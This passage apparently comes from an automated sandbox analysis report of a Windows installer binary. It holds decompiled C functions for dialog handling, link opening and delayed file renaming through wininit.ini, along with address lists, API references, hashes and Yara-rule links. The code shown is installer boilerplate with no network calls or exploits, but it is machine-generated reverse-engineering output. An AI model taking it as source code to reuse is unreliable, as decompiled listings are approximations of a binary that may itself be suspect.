							}
							_t135 = 0x111;
							_a12 = 1;
							goto L14;
						}
						SetWindowLongA(_t117, 0, 0);
						return 1;
					} else {
						DestroyWindow( *0x7a2758);
						 *0x7a2758 = _a12;
						L58:
						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
							ShowWindow(_t117, 0xa);
							 *0x7a0580 = 1;
						}
						L61:
						return 0;
					}
				}
			}




























                                                                              0x004038c9
                                                                              0x004038d1
                                                                              0x00403a4a
                                                                              0x00403a4e
                                                                              0x00403a52
                                                                              0x00403a54
                                                                              0x00403a59
                                                                              0x00403a64
                                                                              0x00403a6f
                                                                              0x00403a74
                                                                              0x00403a76
                                                                              0x00403a78
                                                                              0x00403a7b
                                                                              0x00403a80
                                                                              0x00403a8e
                                                                              0x00403a9b
                                                                              0x00403aa2
                                                                              0x00403aa2
                                                                              0x00403aa3
                                                                              0x00403aa3
                                                                              0x00403aa8
                                                                              0x00403ab5
                                                                              0x00403abb
                                                                              0x00403abd
                                                                              0x00403afd
                                                                              0x00403b02
                                                                              0x00403b07
                                                                              0x00403b07
                                                                              0x00403b0c
                                                                              0x00403b15
                                                                              0x00403b17
                                                                              0x00403b1c
                                                                              0x00403b22
                                                                              0x00403b26
                                                                              0x00403b26
                                                                              0x00403b2b
                                                                              0x00403b32
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403b3d
                                                                              0x00403b43
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403b49
                                                                              0x00403b4c
                                                                              0x00403b4f
                                                                              0x00403b54
                                                                              0x00403b59
                                                                              0x00403b5c
                                                                              0x00403b62
                                                                              0x00403b67
                                                                              0x00403b6a
                                                                              0x00403b70
                                                                              0x00403b75
                                                                              0x00403b78
                                                                              0x00403b7e
                                                                              0x00403b86
                                                                              0x00403b8c
                                                                              0x00403b93
                                                                              0x00403b95
                                                                              0x00403b9c
                                                                              0x00403b9c
                                                                              0x00403b9c
                                                                              0x00403ba6
                                                                              0x00403bb5
                                                                              0x00403bc1
                                                                              0x00403bd0
                                                                              0x00403be7
                                                                              0x00403be9
                                                                              0x00403bef
                                                                              0x00403c04
                                                                              0x00403bf1
                                                                              0x00403bfa
                                                                              0x00403bfc
                                                                              0x00403bfc
                                                                              0x00403c0a
                                                                              0x00403c1a
                                                                              0x00403c1f
                                                                              0x00403c2a
                                                                              0x00403c2b
                                                                              0x00403c32
                                                                              0x00403c38
                                                                              0x00403c3c
                                                                              0x00403c41
                                                                              0x00403c43
                                                                              0x00000000
                                                                              0x00403c49
                                                                              0x00403c49
                                                                              0x00403c4b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403c51
                                                                              0x00403c55
                                                                              0x00403c7a
                                                                              0x00403c80
                                                                              0x00403c86
                                                                              0x00403c89
                                                                              0x00403caf
                                                                              0x00403cb5
                                                                              0x00403cb7
                                                                              0x00403cbc
                                                                              0x00403cc2
                                                                              0x00403cc5
                                                                              0x00403cc8
                                                                              0x00403cdf
                                                                              0x00403ceb
                                                                              0x00403d06
                                                                              0x00403d0c
                                                                              0x00403d10
                                                                              0x00403d1d
                                                                              0x00403d28
                                                                              0x00403d28
                                                                              0x00403cbc
                                                                              0x00000000
                                                                              0x00403c89
                                                                              0x00403c57
                                                                              0x00403c5d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403c63
                                                                              0x00403c69
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403c6f
                                                                              0x00403c43
                                                                              0x00403d35
                                                                              0x00403d41
                                                                              0x00403d41
                                                                              0x00403d49
                                                                              0x00000000
                                                                              0x00403abf
                                                                              0x00403abf
                                                                              0x00403ac2
                                                                              0x00403af5
                                                                              0x00403af5
                                                                              0x00403af7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403af7
                                                                              0x00403ac4
                                                                              0x00403ac8
                                                                              0x00403acd
                                                                              0x00403acf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403adf
                                                                              0x00403ae7
                                                                              0x00000000
                                                                              0x00403aed
                                                                              0x004038e3
                                                                              0x004038e3
                                                                              0x004038ea
                                                                              0x004038fb
                                                                              0x004038fb
                                                                              0x00403904
                                                                              0x0040390d
                                                                              0x00403918
                                                                              0x00403918
                                                                              0x00403924
                                                                              0x00403940
                                                                              0x00403943
                                                                              0x00403958
                                                                              0x0040395b
                                                                              0x00403990
                                                                              0x00403990
                                                                              0x00403996
                                                                              0x00403a37
                                                                              0x00000000
                                                                              0x00403a40
                                                                              0x0040399c
                                                                              0x004039af
                                                                              0x004039b1
                                                                              0x004039b3
                                                                              0x004039d0
                                                                              0x004039d3
                                                                              0x004039d5
                                                                              0x004039da
                                                                              0x004039dd
                                                                              0x004039ec
                                                                              0x004039ef
                                                                              0x00403a22
                                                                              0x00403a35
                                                                              0x00000000
                                                                              0x00403a35
                                                                              0x004039f1
                                                                              0x004039f8
                                                                              0x00403a11
                                                                              0x00403a16
                                                                              0x00403a18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403a1a
                                                                              0x00403a06
                                                                              0x00403a06
                                                                              0x00403a08
                                                                              0x00403a08
                                                                              0x00000000
                                                                              0x00403a08
                                                                              0x004039fb
                                                                              0x00403a00
                                                                              0x00000000
                                                                              0x00403a00
                                                                              0x004039df
                                                                              0x004039e6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004039e8
                                                                              0x00000000
                                                                              0x004039e8
                                                                              0x004039d7
                                                                              0x00000000
                                                                              0x004039d7
                                                                              0x004039bf
                                                                              0x004039c2
                                                                              0x004039c8
                                                                              0x004039ca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004039ca
                                                                              0x00403963
                                                                              0x00403969
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403975
                                                                              0x0040397b
                                                                              0x0040397d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403983
                                                                              0x00403988
                                                                              0x00000000
                                                                              0x00403988
                                                                              0x0040394a
                                                                              0x00000000
                                                                              0x00403926
                                                                              0x0040392c
                                                                              0x00403936
                                                                              0x00403d4f
                                                                              0x00403d56
                                                                              0x00403d64
                                                                              0x00403d6a
                                                                              0x00403d6a
                                                                              0x00403d74
                                                                              0x00000000
                                                                              0x00403d74
                                                                              0x00403924

                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                              • ShowWindow.USER32(?), ref: 00403918
                                                                              • DestroyWindow.USER32 ref: 0040392C
                                                                              • SetWindowLongA.USER32 ref: 0040394A
                                                                              • IsWindowEnabled.USER32 ref: 00403975
                                                                              • GetDlgItem.USER32 ref: 004039A3
                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                              • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                              • GetDlgItem.USER32 ref: 00403A6A
                                                                              • GetDlgItem.USER32 ref: 00403A74
                                                                              • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                              • GetDlgItem.USER32 ref: 00403B86
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                              • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                              • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                              • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                              • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                              • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3950083612-0
                                                                              • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                              • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                              • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                              • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00403EEF, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 204windowstringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79f568 =  *0x79f568 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E0E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1f20;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a2f84, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a2f84, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79ed58 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040417A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a2fb8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403EBB;
				E00403DA7(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DA7(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DDC(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a2f88 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79e54c =  *0x79e54c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79f568 =  *0x79f568 & 0x00000000;
				return 0;
			}

















                                                                              0x00403eff
                                                                              0x00404025
                                                                              0x00404081
                                                                              0x00404085
                                                                              0x0040415c
                                                                              0x0040415e
                                                                              0x0040415e
                                                                              0x00404164
                                                                              0x00404164
                                                                              0x00404167
                                                                              0x00000000
                                                                              0x0040416e
                                                                              0x00404093
                                                                              0x00404095
                                                                              0x0040409f
                                                                              0x004040aa
                                                                              0x004040ad
                                                                              0x004040b0
                                                                              0x004040bb
                                                                              0x004040be
                                                                              0x004040c5
                                                                              0x004040d3
                                                                              0x004040eb
                                                                              0x004040fe
                                                                              0x0040410e
                                                                              0x00404110
                                                                              0x00404110
                                                                              0x004040c5
                                                                              0x0040411a
                                                                              0x00000000
                                                                              0x00404125
                                                                              0x00404129
                                                                              0x0040413a
                                                                              0x0040413a
                                                                              0x00404140
                                                                              0x0040414e
                                                                              0x0040414e
                                                                              0x00000000
                                                                              0x00404152
                                                                              0x0040411a
                                                                              0x00404030
                                                                              0x00000000
                                                                              0x00404044
                                                                              0x0040404a
                                                                              0x00404050
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00404075
                                                                              0x00404077
                                                                              0x0040407c
                                                                              0x00000000
                                                                              0x0040407c
                                                                              0x00404030
                                                                              0x00403f05
                                                                              0x00403f08
                                                                              0x00403f0d
                                                                              0x00403f1e
                                                                              0x00403f1e
                                                                              0x00403f25
                                                                              0x00403f28
                                                                              0x00403f2a
                                                                              0x00403f2f
                                                                              0x00403f38
                                                                              0x00403f3e
                                                                              0x00403f4a
                                                                              0x00403f4d
                                                                              0x00403f56
                                                                              0x00403f5b
                                                                              0x00403f5e
                                                                              0x00403f63
                                                                              0x00403f7a
                                                                              0x00403f81
                                                                              0x00403f94
                                                                              0x00403f97
                                                                              0x00403fac
                                                                              0x00403fb3
                                                                              0x00403fb8
                                                                              0x00403fbd
                                                                              0x00403fbd
                                                                              0x00403fcc
                                                                              0x00403fdb
                                                                              0x00403fdd
                                                                              0x00403ff3
                                                                              0x00404002
                                                                              0x00404004
                                                                              0x00000000

                                                                              APIs
                                                                              • CheckDlgButton.USER32 ref: 00403F7A
                                                                              • GetDlgItem.USER32 ref: 00403F8E
                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                              • GetSysColor.USER32(?), ref: 00403FBD
                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                              • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                              • GetDlgItem.USER32 ref: 00404065
                                                                              • SendMessageA.USER32(00000000), ref: 00404068
                                                                              • GetDlgItem.USER32 ref: 00404093
                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
                                                                              • LoadCursorA.USER32 ref: 004040E2
                                                                              • SetCursor.USER32(00000000), ref: 004040EB
                                                                              • ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
                                                                              • LoadCursorA.USER32 ref: 0040410B
                                                                              • SetCursor.USER32(00000000), ref: 0040410E
                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                              • String ID: N$open
                                                                              • API String ID: 3615053054-904208323
                                                                              • Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                              • Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
                                                                              • Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
                                                                              • Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                                                              0x00405715
                                                                              0x0040571c
                                                                              0x00405720
                                                                              0x00405729
                                                                              0x0040572d
                                                                              0x00405879
                                                                              0x00405879
                                                                              0x00000000
                                                                              0x00405879
                                                                              0x0040572d
                                                                              0x00405739
                                                                              0x0040574f
                                                                              0x00405777
                                                                              0x00405782
                                                                              0x00405786
                                                                              0x004057a9
                                                                              0x004057b1
                                                                              0x004057bd
                                                                              0x004057d4
                                                                              0x004057da
                                                                              0x004057df
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004057ee
                                                                              0x004057f0
                                                                              0x004057fd
                                                                              0x00405801
                                                                              0x00405872
                                                                              0x00405873
                                                                              0x00000000
                                                                              0x0040581d
                                                                              0x0040582a
                                                                              0x0040588f
                                                                              0x00405896
                                                                              0x0040583d
                                                                              0x0040583d
                                                                              0x0040583f
                                                                              0x00405848
                                                                              0x00405853
                                                                              0x00405865
                                                                              0x0040586c
                                                                              0x00000000
                                                                              0x0040586c
                                                                              0x00405898
                                                                              0x0040589e
                                                                              0x004058a0
                                                                              0x004058af
                                                                              0x004058af
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004058a2
                                                                              0x004058a2
                                                                              0x004058a4
                                                                              0x004058a7
                                                                              0x004058ab
                                                                              0x00000000
                                                                              0x004058a2
                                                                              0x00405835
                                                                              0x0040583a
                                                                              0x00000000
                                                                              0x0040583a
                                                                              0x00405801
                                                                              0x00405751
                                                                              0x0040575c
                                                                              0x00405765
                                                                              0x00405769
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00405769
                                                                              0x00405883

                                                                              APIs
                                                                                • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                                • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                                • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
                                                                              • GetShortPathNameA.KERNEL32 ref: 00405765
                                                                              • GetShortPathNameA.KERNEL32 ref: 00405782
                                                                              • wsprintfA.USER32 ref: 004057A0
                                                                              • GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
                                                                              • lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
                                                                              • CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
                                                                              • GlobalFree.KERNEL32 ref: 0040586C
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873
                                                                                • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
                                                                                • Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp Download File
                                                                              Similarity
                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                              • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                              • API String ID: 3633819597-1342836890
                                                                              • Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                              • Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
                                                                              • Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
                                                                              • Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 90%
                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                              0x0040100a
                                                                              0x00401039
                                                                              0x00401047
                                                                              0x0040104d
                                                                              0x00401051
                                                                              0x0040105b
                                                                              0x00401061
                                                                              0x00401064
                                                                              0x004010f3
                                                                              0x00401089
                                                                              0x0040108c
                                                                              0x004010a6
